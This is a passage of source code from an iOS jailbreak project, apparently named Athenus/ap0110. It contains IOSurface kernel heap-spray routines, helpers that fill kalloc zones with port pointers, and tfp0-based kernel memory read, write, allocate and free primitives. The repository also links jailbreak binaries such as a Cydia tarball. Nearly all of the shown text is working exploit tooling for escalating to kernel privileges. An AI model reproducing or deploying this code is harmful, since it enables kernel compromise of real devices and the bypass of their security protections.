147 | sched_yield();
148 | sleep(1);
149 | free(body);
150 | }
151 |
152 | mach_vm_size_t pagesize = 0;
153 |
154 | const uint64_t IOSURFACE_CREATE_SURFACE = 0;
155 | const uint64_t IOSURFACE_SET_VALUE = 9;
156 | const uint64_t IOSURFACE_GET_VALUE = 10;
157 | const uint64_t IOSURFACE_DELETE_VALUE = 11;
158 |
159 | int init_IOSurface() {
160 | kern_return_t ret = KERN_SUCCESS;
161 |
162 | ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize);
163 | printf("[i] page size: 0x%llx, %s\n", pagesize, mach_error_string(ret));
164 | if (ret != KERN_SUCCESS) {
165 | printf("[-] failed to get page size! ret: %x %s\n", ret, mach_error_string(ret));
166 | return ret;
167 | }
168 | return !IOSurface_init();
169 | }
170 |
171 | void deinit_IOSurface() {
172 | IOSurface_deinit();
173 | }
174 |
175 | int spray_IOSurface(void *data, size_t size) {
176 | return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL);
177 | }
178 |
--------------------------------------------------------------------------------
/Athenus/exploit_utilities.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef exploit_utilities_h
10 | #define exploit_utilities_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 |
21 | struct ool_msg {
22 | mach_msg_header_t hdr;
23 | mach_msg_body_t body;
24 | mach_msg_ool_ports_descriptor_t ool_ports;
25 | };
26 |
27 | struct simple_msg {
28 | mach_msg_header_t hdr;
29 | char buf[0];
30 | };
31 |
32 | size_t message_size_for_kalloc_size(size_t kalloc_size);
33 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition);
34 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size);
35 | void trigger_gc(void);
36 |
37 | enum {
38 | kIOCFSerializeToBinary = 0x00000001U,
39 | };
40 |
41 | #define kOSSerializeBinarySignature 0x000000D3U
42 |
43 | enum {
44 | kOSSerializeDictionary = 0x01000000U,
45 | kOSSerializeArray = 0x02000000U,
46 | kOSSerializeSet = 0x03000000U,
47 | kOSSerializeNumber = 0x04000000U,
48 | kOSSerializeSymbol = 0x08000000U,
49 | kOSSerializeString = 0x09000000U,
50 | kOSSerializeData = 0x0a000000U,
51 | kOSSerializeBoolean = 0x0b000000U,
52 | kOSSerializeObject = 0x0c000000U,
53 |
54 | kOSSerializeTypeMask = 0x7F000000U,
55 | kOSSerializeDataMask = 0x00FFFFFFU,
56 |
57 | kOSSerializeEndCollection = 0x80000000U,
58 |
59 | kOSSerializeMagic = 0x000000d3U,
60 | };
61 |
62 | extern mach_vm_size_t pagesize;
63 |
64 | extern const uint64_t IOSURFACE_CREATE_SURFACE;
65 | extern const uint64_t IOSURFACE_SET_VALUE;
66 | extern const uint64_t IOSURFACE_GET_VALUE;
67 | extern const uint64_t IOSURFACE_DELETE_VALUE;
68 |
69 | int init_IOSurface(void);
70 | void deinit_IOSurface(void);
71 | int spray_IOSurface(void *data, size_t size);
72 |
73 | #endif /* exploit_utilities_h */
74 |
--------------------------------------------------------------------------------
/Athenus/fuckyou.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/fuckyou.png
--------------------------------------------------------------------------------
/Athenus/iosurface.c:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.c
3 | * Brandon Azad
4 | */
5 | #define IOSURFACE_EXTERN
6 | #include "iosurface.h"
7 |
8 | // ---- Global variables --------------------------------------------------------------------------
9 |
10 | // Is the IOSurface subsystem initialized?
11 | static bool IOSurface_initialized;
12 |
13 | // ---- Functions ---------------------------------------------------------------------------------
14 |
15 | #define ERROR(str, ...) printf("[-] "str, ##__VA_ARGS__)
16 | bool
17 | IOSurface_init() {
18 | if (IOSurface_initialized) {
19 | return true;
20 | }
21 | IOSurfaceRoot = IOServiceGetMatchingService(
22 | kIOMasterPortDefault,
23 | IOServiceMatching("IOSurfaceRoot"));
24 | if (IOSurfaceRoot == MACH_PORT_NULL) {
25 | ERROR("could not find %s", "IOSurfaceRoot");
26 | return false;
27 | }
28 | kern_return_t kr = IOServiceOpen(
29 | IOSurfaceRoot,
30 | mach_task_self(),
31 | 0,
32 | &IOSurfaceRootUserClient);
33 | if (kr != KERN_SUCCESS) {
34 | ERROR("could not open %s", "IOSurfaceRootUserClient");
35 | return false;
36 | }
37 | struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = 0x4000, };
38 | struct IOSurfaceLockResult lock_result;
39 |
40 | extern uint32_t create_outsize;
41 | size_t lock_result_size = create_outsize;
42 | kr = IOConnectCallMethod(
43 | IOSurfaceRootUserClient,
44 | 6, // create_surface_client_fast_path
45 | NULL, 0,
46 | &create_args, sizeof(create_args),
47 | NULL, NULL,
48 | &lock_result, &lock_result_size);
49 | if (kr != KERN_SUCCESS) {
50 | ERROR("could not create %s: 0x%x", "IOSurfaceClient", kr);
51 | return false;
52 | }
53 | IOSurface_id = lock_result.surface_id;
54 | if (!IOSurface_id) {
55 | IOSurface_id = (uint32_t)lock_result.addr3;
56 | }
57 | IOSurface_initialized = true;
58 | return true;
59 | }
60 |
61 | void
62 | IOSurface_deinit() {
63 | assert(IOSurface_initialized);
64 | IOSurface_initialized = false;
65 | IOSurface_id = 0;
66 | IOServiceClose(IOSurfaceRootUserClient);
67 | IOObjectRelease(IOSurfaceRoot);
68 | }
69 |
70 | /*
71 | * IOSurface_set_value
72 | *
73 | * Description:
74 | * A wrapper around IOSurfaceRootUserClient::set_value().
75 | */
76 | bool
77 | IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) {
78 | struct IOSurfaceValueResultArgs result;
79 | size_t result_size = sizeof(result);
80 | kern_return_t kr = IOConnectCallMethod(
81 | IOSurfaceRootUserClient,
82 | 9, // set_value
83 | NULL, 0,
84 | args, args_size,
85 | NULL, NULL,
86 | &result, &result_size);
87 | if (kr != KERN_SUCCESS) {
88 | ERROR("failed to %s value in %s: 0x%x", "set", "IOSurface", kr);
89 | return false;
90 | }
91 | return true;
92 | }
93 |
94 | /*
95 | * IOSurface_get_value
96 | *
97 | * Description:
98 | * A wrapper around IOSurfaceRootUserClient::get_value().
99 | */
100 | static bool
101 | IOSurface_get_value(const struct IOSurfaceValueArgs *in, size_t in_size,
102 | struct IOSurfaceValueArgs *out, size_t *out_size) {
103 | kern_return_t kr = IOConnectCallMethod(
104 | IOSurfaceRootUserClient,
105 | 10, // get_value
106 | NULL, 0,
107 | in, in_size,
108 | NULL, NULL,
109 | out, out_size);
110 | if (kr != KERN_SUCCESS) {
111 | ERROR("failed to %s value in %s: 0x%x", "get", "IOSurface", kr);
112 | return false;
113 | }
114 | return true;
115 | }
116 |
117 | /*
118 | * IOSurface_remove_value
119 | *
120 | * Description:
121 | * A wrapper around IOSurfaceRootUserClient::remove_value().
122 | */
123 | static bool
124 | IOSurface_remove_value(const struct IOSurfaceValueArgs *args, size_t args_size) {
125 | struct IOSurfaceValueResultArgs result;
126 | size_t result_size = sizeof(result);
127 | kern_return_t kr = IOConnectCallMethod(
128 | IOSurfaceRootUserClient,
129 | 11, // remove_value
130 | NULL, 0,
131 | args, args_size,
132 | NULL, NULL,
133 | &result, &result_size);
134 | if (kr != KERN_SUCCESS) {
135 | ERROR("failed to %s value in %s: 0x%x", "remove", "IOSurface", kr);
136 | return false;
137 | }
138 | return true;
139 | }
140 |
141 | /*
142 | * base255_encode
143 | *
144 | * Description:
145 | * Encode an integer so that it does not contain any null bytes.
146 | */
147 | static uint32_t
148 | base255_encode(uint32_t value) {
149 | uint32_t encoded = 0;
150 | for (unsigned i = 0; i < sizeof(value); i++) {
151 | encoded |= ((value % 255) + 1) << (8 * i);
152 | value /= 255;
153 | }
154 | return encoded;
155 | }
156 |
157 | /*
158 | * xml_units_for_data_size
159 | *
160 | * Description:
161 | * Return the number of XML units needed to store the given size of data in an OSString.
162 | */
163 | static size_t
164 | xml_units_for_data_size(size_t data_size) {
165 | return ((data_size - 1) + sizeof(uint32_t) - 1) / sizeof(uint32_t);
166 | }
167 |
168 | /*
169 | * serialize_IOSurface_data_array
170 | *
171 | * Description:
172 | * Create the template of the serialized array to pass to IOSurfaceUserClient::set_value().
173 | * Returns the size of the serialized data in bytes.
174 | */
175 | static size_t
176 | serialize_IOSurface_data_array(uint32_t *xml0, uint32_t array_length, uint32_t data_size,
177 | uint32_t **xml_data, uint32_t **key) {
178 | uint32_t *xml = xml0;
179 | *xml++ = kOSSerializeBinarySignature;
180 | *xml++ = kOSSerializeArray | 2 | kOSSerializeEndCollection;
181 | *xml++ = kOSSerializeArray | array_length;
182 | for (size_t i = 0; i < array_length; i++) {
183 | uint32_t flags = (i == array_length - 1 ? kOSSerializeEndCollection : 0);
184 | *xml++ = kOSSerializeData | (data_size - 1) | flags;
185 | xml_data[i] = xml;
186 | xml += xml_units_for_data_size(data_size);
187 | }
188 | *xml++ = kOSSerializeSymbol | sizeof(uint32_t) + 1 | kOSSerializeEndCollection;
189 | *key = xml++; // This will be filled in on each array loop.
190 | *xml++ = 0; // Null-terminate the symbol.
191 | return (xml - xml0) * sizeof(*xml);
192 | }
193 |
194 | /*
195 | * IOSurface_spray_with_gc_internal
196 | *
197 | * Description:
198 | * A generalized version of IOSurface_spray_with_gc() and IOSurface_spray_size_with_gc().
199 | */
200 |
201 | static uint32_t total_arrays = 0;
202 | static bool
203 | IOSurface_spray_with_gc_internal(uint32_t array_count, uint32_t array_length, uint32_t extra_count,
204 | void *data, uint32_t data_size,
205 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {
206 | assert(array_count <= 0xffffff);
207 | assert(array_length <= 0xffff);
208 | assert(data_size <= 0xffffff);
209 | assert(extra_count < array_count);
210 | // Make sure our IOSurface is initialized.
211 | bool ok = IOSurface_init();
212 | if (!ok) {
213 | return 0;
214 | }
215 | // How big will our OSUnserializeBinary dictionary be?
216 | uint32_t current_array_length = array_length + (extra_count > 0 ? 1 : 0);
217 | size_t xml_units_per_data = xml_units_for_data_size(data_size);
218 | size_t xml_units = 1 + 1 + 1 + (1 + xml_units_per_data) * current_array_length + 1 + 1 + 1;
219 | // Allocate the args struct.
220 | struct IOSurfaceValueArgs *args;
221 | size_t args_size = sizeof(*args) + xml_units * sizeof(args->xml[0]);
222 | args = malloc(args_size);
223 | assert(args != 0);
224 | // Build the IOSurfaceValueArgs.
225 | args->surface_id = IOSurface_id;
226 | // Create the serialized OSArray. We'll remember the locations we need to fill in with our
227 | // data as well as the slot we need to set our key.
228 | uint32_t **xml_data = malloc(current_array_length * sizeof(*xml_data));
229 | assert(xml_data != NULL);
230 | uint32_t *key;
231 | size_t xml_size = serialize_IOSurface_data_array(args->xml,
232 | current_array_length, data_size, xml_data, &key);
233 | assert(xml_size == xml_units * sizeof(args->xml[0]));
234 | // Keep track of when we need to do GC.
235 | size_t sprayed = 0;
236 | size_t next_gc_step = 0;
237 | // Loop through the arrays.
238 | for (uint32_t array_id = 0; array_id < array_count; array_id++) {
239 | // If we've crossed the GC sleep boundary, sleep for a bit and schedule the
240 | // next one.
241 | // Now build the array and its elements.
242 | *key = base255_encode(total_arrays + array_id);
243 | for (uint32_t data_id = 0; data_id < current_array_length; data_id++) {
244 | // Update the data for this spray if the user requested.
245 | if (callback != NULL) {
246 | callback(array_id, data_id, data, data_size);
247 | }
248 | // Copy in the data to the appropriate slot.
249 | memcpy(xml_data[data_id], data, data_size - 1);
250 | }
251 | // Finally set the array in the surface.
252 | ok = IOSurface_set_value(args, args_size);
253 | if (!ok) {
254 | free(args);
255 | free(xml_data);
256 | return false;
257 | }
258 | if (ok) {
259 | sprayed += data_size * current_array_length;
260 | // If we just sprayed an array with an extra element, decrement the
261 | // outstanding extra_count.
262 | if (current_array_length > array_length) {
263 | assert(extra_count > 0);
264 | extra_count--;
265 | // If our extra_count is now 0, rebuild our serialized array. (We
266 | // could implement this as a memmove(), but I'm lazy.)
267 | if (extra_count == 0) {
268 | current_array_length--;
269 | serialize_IOSurface_data_array(args->xml,
270 | current_array_length, data_size,
271 | xml_data, &key);
272 | }
273 | }
274 | }
275 | }
276 | if (next_gc_step > 0) {
277 | // printf("\n");
278 | }
279 | // Clean up resources.
280 | free(args);
281 | free(xml_data);
282 | total_arrays += array_count;
283 | return true;
284 | }
285 |
286 | bool
287 | IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,
288 | void *data, uint32_t data_size,
289 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {
290 | return IOSurface_spray_with_gc_internal(array_count, array_length, 0,
291 | data, data_size, callback);
292 | }
293 |
294 | bool
295 | IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,
296 | void *data, uint32_t data_size,
297 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {
298 | assert(array_count <= 0xffffff);
299 | assert(data_size <= 0xffffff);
300 | size_t data_count = (spray_size + data_size - 1) / data_size;
301 | size_t array_length = data_count / array_count;
302 | size_t extra_count = data_count % array_count;
303 | assert(array_length <= 0xffff);
304 | return IOSurface_spray_with_gc_internal(array_count, (uint32_t) array_length,
305 | (uint32_t) extra_count, data, data_size, callback);
306 | }
307 |
308 | bool
309 | IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,
310 | void (^callback)(uint32_t data_id, void *data, size_t size)) {
311 | assert(IOSurface_initialized);
312 | assert(array_id < 0xffffff);
313 | assert(array_length <= 0xffff);
314 | assert(data_size <= 0xffffff);
315 | bool success = false;
316 | // Create the input args.
317 | struct IOSurfaceValueArgs_string args_in = {};
318 | args_in.surface_id = IOSurface_id;
319 | args_in.string_data = base255_encode(array_id);
320 | // Create the output args.
321 | size_t xml_units_per_data = xml_units_for_data_size(data_size);
322 | size_t xml_units = 1 + 1 + (1 + xml_units_per_data) * array_length;
323 | struct IOSurfaceValueArgs *args_out;
324 | size_t args_out_size = sizeof(*args_out) + xml_units * sizeof(args_out->xml[0]);
325 | // Over-allocate the output buffer a little bit. This allows us to directly pass the inline
326 | // data to the client without having to worry about the fact that the kernel data is 1 byte
327 | // shorter (which otherwise would produce an out-of-bounds read on the last element for
328 | // certain data sizes). Yeah, it's a hack, deal with it.
329 | args_out = malloc(args_out_size + sizeof(uint32_t));
330 | assert(args_out != 0);
331 | // Get the value.
332 | bool ok = IOSurface_get_value((struct IOSurfaceValueArgs *)&args_in, sizeof(args_in),
333 | args_out, &args_out_size);
334 | if (!ok) {
335 | goto fail;
336 | }
337 | // Do the ugly parsing ourselves. :(
338 | uint32_t *xml = args_out->xml;
339 | if (*xml++ != kOSSerializeBinarySignature) {
340 | ERROR("did not find OSSerializeBinary signature");
341 | goto fail;
342 | }
343 | if (*xml++ != (kOSSerializeArray | array_length | kOSSerializeEndCollection)) {
344 | ERROR("unexpected container");
345 | goto fail;
346 | }
347 | for (uint32_t data_id = 0; data_id < array_length; data_id++) {
348 | uint32_t flags = (data_id == array_length - 1 ? kOSSerializeEndCollection : 0);
349 | if (*xml++ != (kOSSerializeString | data_size - 1 | flags)) {
350 | ERROR("unexpected data: 0x%x != 0x%x at index %u",
351 | xml[-1], kOSSerializeString | data_size - 1 | flags,
352 | data_id);
353 | goto fail;
354 | }
355 | callback(data_id, (void *)xml, data_size);
356 | xml += xml_units_per_data;
357 | }
358 | success = true;
359 | fail:
360 | free(args_out);
361 | return success;
362 | }
363 |
364 | bool
365 | IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,
366 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {
367 | assert(IOSurface_initialized);
368 | assert(array_count <= 0xffffff);
369 | assert(array_length <= 0xffff);
370 | assert(data_size <= 0xffffff);
371 | bool ok = true;
372 | //TODO: We should probably amortize the creation of the output buffer.
373 | for (uint32_t array_id = 0; array_id < array_count; array_id++) {
374 | ok &= IOSurface_spray_read_array(array_id, array_length, data_size,
375 | ^(uint32_t data_id, void *data, size_t size) {
376 | callback(array_id, data_id, data, size);
377 | });
378 | }
379 | return ok;
380 | }
381 |
382 | bool
383 | IOSurface_spray_remove_array(uint32_t array_id) {
384 | assert(IOSurface_initialized);
385 | assert(array_id < 0xffffff);
386 | struct IOSurfaceValueArgs_string args = {};
387 | args.surface_id = IOSurface_id;
388 | args.string_data = base255_encode(array_id);
389 | return IOSurface_remove_value((struct IOSurfaceValueArgs *)&args, sizeof(args));
390 | }
391 |
392 | bool
393 | IOSurface_spray_clear(uint32_t array_count) {
394 | assert(IOSurface_initialized);
395 | assert(array_count <= 0xffffff);
396 | bool ok = true;
397 | for (uint32_t array_id = 0; array_id < array_count; array_id++) {
398 | ok &= IOSurface_spray_remove_array(array_id);
399 | }
400 | return ok;
401 | }
402 |
--------------------------------------------------------------------------------
/Athenus/iosurface.h:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_
6 | #define VOUCHER_SWAP__IOSURFACE_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 | #include "exploit_utilities.h"
17 |
18 | #ifdef IOSURFACE_EXTERN
19 | #define extern IOSURFACE_EXTERN
20 | #endif
21 |
22 | // The IOSurfaceRoot service.
23 | extern mach_port_t IOSurfaceRoot;
24 |
25 | // An IOSurfaceRootUserClient instance.
26 | extern mach_port_t IOSurfaceRootUserClient;
27 |
28 | // The ID of the IOSurface we're using.
29 | extern uint32_t IOSurface_id;
30 |
31 | /*
32 | * IOSurface_init
33 | *
34 | * Description:
35 | * Initialize the IOSurface subsystem.
36 | */
37 | bool IOSurface_init(void);
38 |
39 | /*
40 | * IOSurface_deinit
41 | *
42 | * Description:
43 | * Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.
44 | */
45 | void IOSurface_deinit(void);
46 |
47 | /*
48 | * IOSurface_spray_with_gc
49 | *
50 | * Description:
51 | * Spray kernel memory using IOSurface properties.
52 | *
53 | * The current implementation stores each data allocation in an OSString. The reason for this
54 | * is that OSString contents will be allocated using kalloc() even for allocations larger than
55 | * the page size. OSData on the other hand will use kmem_alloc() for large allocations.
56 | * Consequently, the last byte of data will be zeroed out to create a null terminator.
57 | */
58 | bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,
59 | void *data, uint32_t data_size,
60 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
61 |
62 | /*
63 | * IOSurface_spray_size_with_gc
64 | *
65 | * Description:
66 | * Spray kernel memory using IOSurface properties.
67 | *
68 | * This function computes the number of elements per array automatically.
69 | */
70 | bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,
71 | void *data, uint32_t data_size,
72 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
73 |
74 | /*
75 | * IOSurface_spray_read_array
76 | *
77 | * Description:
78 | * Read back the data elements in a particular array in a particular IOSurface spray.
79 | */
80 | bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,
81 | void (^callback)(uint32_t data_id, void *data, size_t size));
82 |
83 | /*
84 | * IOSurface_spray_read_all_data
85 | *
86 | * Description:
87 | * Read back all the data elements in an IOSurface spray.
88 | */
89 | bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,
90 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
91 |
92 | /*
93 | * IOSurface_spray_remove_array
94 | *
95 | * Description:
96 | * Remove a particular array from an IOSurface spray, freeing the contained data elements.
97 | */
98 | bool IOSurface_spray_remove_array(uint32_t array_id);
99 |
100 | /*
101 | * IOSurface_spray_clear
102 | *
103 | * Description:
104 | * Remove all the arrays from an IOSurface spray, freeing all the data elements.
105 | */
106 | bool IOSurface_spray_clear(uint32_t array_count);
107 |
108 | // ---- IOSurface types ---------------------------------------------------------------------------
109 |
110 | struct _IOSurfaceFastCreateArgs {
111 | uint64_t address;
112 | uint32_t width;
113 | uint32_t height;
114 | uint32_t pixel_format;
115 | uint32_t bytes_per_element;
116 | uint32_t bytes_per_row;
117 | uint32_t alloc_size;
118 | };
119 |
120 | struct IOSurfaceLockResult {
121 | uint64_t addr1;
122 | uint64_t addr2;
123 | uint64_t addr3;
124 | uint32_t surface_id;
125 | uint8_t _pad2[0xdd0-0x18-0x4];
126 | };
127 |
128 | #if !__cplusplus
129 | struct IOSurfaceValueArgs {
130 | uint32_t surface_id;
131 | uint32_t _out1;
132 | union {
133 | uint32_t xml[0];
134 | char string[0];
135 | };
136 | };
137 | #endif
138 |
139 | struct IOSurfaceValueArgs_string {
140 | uint32_t surface_id;
141 | uint32_t _out1;
142 | uint32_t string_data;
143 | char null;
144 | };
145 |
146 | struct IOSurfaceValueResultArgs {
147 | uint32_t out;
148 | };
149 |
150 |
151 | bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);
152 |
153 | #undef extern
154 |
155 | #endif
156 |
--------------------------------------------------------------------------------
/Athenus/jailbreak.h:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.h
3 | // doubleH3lix
4 | //
5 | // Created by tihmstar on 18.02.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef jailbreak_h
10 | #define jailbreak_h
11 |
12 | #include
13 |
14 | extern dispatch_queue_t jailbreak_queue;
15 |
16 | int jailbreak(void);
17 |
18 | int jailbreak_system(const char *command);
19 |
20 | #endif /* jailbreak_h */
21 |
--------------------------------------------------------------------------------
/Athenus/jbresources/Cydia-10.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/Cydia-10.tar
--------------------------------------------------------------------------------
/Athenus/jbresources/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/launchctl
--------------------------------------------------------------------------------
/Athenus/jbresources/python.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/python.tar
--------------------------------------------------------------------------------
/Athenus/jbresources/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/tar
--------------------------------------------------------------------------------
/Athenus/kernel_memory.c:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #include "kernel_memory.h"
10 | #include
11 | #include "offsets.h"
12 |
13 | extern mach_port_t tfp0;
14 |
15 | void init_kernel_memory(mach_port_t _tfp0) {
16 | tfp0 = _tfp0;
17 | }
18 |
19 | kptr_t kalloc(vm_size_t size) {
20 | return kmem_alloc(size);
21 | }
22 |
23 | void kfree(mach_vm_address_t address, vm_size_t size) {
24 | kmem_free((kptr_t)address, size);
25 | }
26 |
27 | size_t kread(kptr_t where, void *p, size_t size) {
28 | int rv;
29 | size_t offset = 0;
30 | while (offset < size) {
31 | mach_vm_size_t sz, chunk = 2048;
32 | if (chunk > size - offset) {
33 | chunk = size - offset;
34 | }
35 | rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);
36 | if (rv || sz == 0) {
37 | printf("[-] error on kread("ADDR")\n", where);
38 | break;
39 | }
40 | offset += sz;
41 | }
42 | return offset;
43 | }
44 |
45 | size_t kwrite(kptr_t where, const void *p, size_t size) {
46 | int rv;
47 | size_t offset = 0;
48 | while (offset < size) {
49 | size_t chunk = 2048;
50 | if (chunk > size - offset) {
51 | chunk = size - offset;
52 | }
53 | rv = mach_vm_write(tfp0, where + offset, (vm_offset_t)p + offset, (int)chunk);
54 | if (rv) {
55 | printf("[-] error on kwrite("ADDR")\n", where);
56 | break;
57 | }
58 | offset += chunk;
59 | }
60 | return offset;
61 | }
62 |
63 | uintptr_t
64 | find_port(mach_port_name_t port, kptr_t task_self) {
65 | uintptr_t task_addr = rkptr(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
66 | uintptr_t itk_space = rkptr(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
67 | uintptr_t is_table = rkptr(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
68 |
69 | uint32_t port_index = port >> 8;
70 | const int sizeof_ipc_entry_t = koffset(KSTRUCT_SIZE_IPC_ENTRY);
71 |
72 | uintptr_t port_addr = rkptr(is_table + (port_index * sizeof_ipc_entry_t));
73 |
74 | return port_addr;
75 | }
76 |
77 | uint64_t kread_uint64(kptr_t where){
78 | uint64_t value = 0;
79 | size_t sz = kread(where, &value, sizeof(value));
80 | return (sz == sizeof(value)) ? value : 0;
81 | }
82 |
83 | uint32_t kread_uint32(kptr_t where){
84 | uint32_t value = 0;
85 | size_t sz = kread(where, &value, sizeof(value));
86 | return (sz == sizeof(value)) ? value : 0;
87 | }
88 |
89 | uintptr_t kread_uintptr(kptr_t where){
90 | uintptr_t value = 0;
91 | size_t sz = kread(where, &value, sizeof(value));
92 | return (sz == sizeof(value)) ? value : 0;
93 | }
94 |
95 | size_t kwrite_uint64(kptr_t where, uint64_t value){
96 | return kwrite(where, &value, sizeof(value));
97 | }
98 |
99 | size_t kwrite_uint32(kptr_t where, uint32_t value){
100 | return kwrite(where, &value, sizeof(value));
101 | }
102 |
103 | size_t kwrite_uintptr(kptr_t where, uintptr_t value) {
104 | return kwrite(where, &value, sizeof(value));
105 | }
106 |
107 | kptr_t kmem_alloc(uint64_t size) {
108 | if (!MACH_PORT_VALID(tfp0)) {
109 | printf("attempt to allocate kernel memory before any kernel memory write primitives available");
110 | return 0;
111 | }
112 |
113 | kern_return_t err;
114 | mach_vm_address_t addr = 0;
115 | mach_vm_size_t ksize = round_page_kernel(size);
116 | err = mach_vm_allocate(tfp0, &addr, ksize, VM_FLAGS_ANYWHERE);
117 | if (err != KERN_SUCCESS) {
118 | printf("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
119 | return 0;
120 | }
121 |
122 | return (kptr_t)addr;
123 | }
124 |
125 | bool
126 | kmem_free(mach_vm_address_t kaddr, vm_size_t size) {
127 | if (!MACH_PORT_VALID(tfp0)) {
128 | printf("attempt to deallocate kernel memory before any kernel memory write primitives available");
129 | return false;
130 | }
131 |
132 | kern_return_t err;
133 | mach_vm_size_t ksize = round_page_kernel(size);
134 | err = mach_vm_deallocate(tfp0, kaddr, ksize);
135 | if (err != KERN_SUCCESS) {
136 | printf("unable to deallocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
137 | return false;
138 | }
139 |
140 | return true;
141 | }
142 |
143 | bool rkbuffer(kptr_t kaddr, void* buffer, size_t length) {
144 | if (!MACH_PORT_VALID(tfp0)) {
145 | printf("attempt to read kernel memory but no kernel memory read primitives available");
146 | return 0;
147 | }
148 |
149 | return (kread(kaddr, buffer, length) == length);
150 | }
151 |
152 | bool wkbuffer(kptr_t kaddr, void* buffer, size_t length) {
153 | if (!MACH_PORT_VALID(tfp0)) {
154 | printf("attempt to write to kernel memory before any kernel memory write primitives available");
155 | return false;
156 | }
157 |
158 | return (kwrite(kaddr, buffer, length) == length);
159 | }
160 |
--------------------------------------------------------------------------------
/Athenus/kernel_memory.h:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_memory.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/18/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef kernel_memory_h
10 | #define kernel_memory_h
11 |
12 | #include
13 | #include
14 | #include "common.h"
15 | #include
16 |
17 | __BEGIN_DECLS
18 |
19 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
20 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
21 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
22 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);;
23 | kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
24 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);
25 |
26 | void init_kernel_memory(mach_port_t tfp0);
27 |
28 | size_t kread(kptr_t where, void *p, size_t size);
29 |
30 | #define rk32(where) kread_uint32(where)
31 | #define rk64(where) kread_uint64(where)
32 | #define rkptr(where) kread_uintptr(where)
33 |
34 | size_t kwrite(kptr_t where, const void *p, size_t size);
35 | uint64_t kread_uint64(kptr_t where);
36 | uint32_t kread_uint32(kptr_t where);
37 | uintptr_t kread_uintptr(kptr_t where);
38 | size_t kwrite_uint64(kptr_t where, uint64_t value);
39 | size_t kwrite_uint32(kptr_t where, uint32_t value);
40 | size_t kwrite_uintptr(kptr_t where, uintptr_t value);
41 |
42 | void wk32(kptr_t where, uint32_t what);
43 | void wk64(kptr_t where, uint64_t what);
44 |
45 | #define wk32(where, what) kwrite_uint32(where, what)
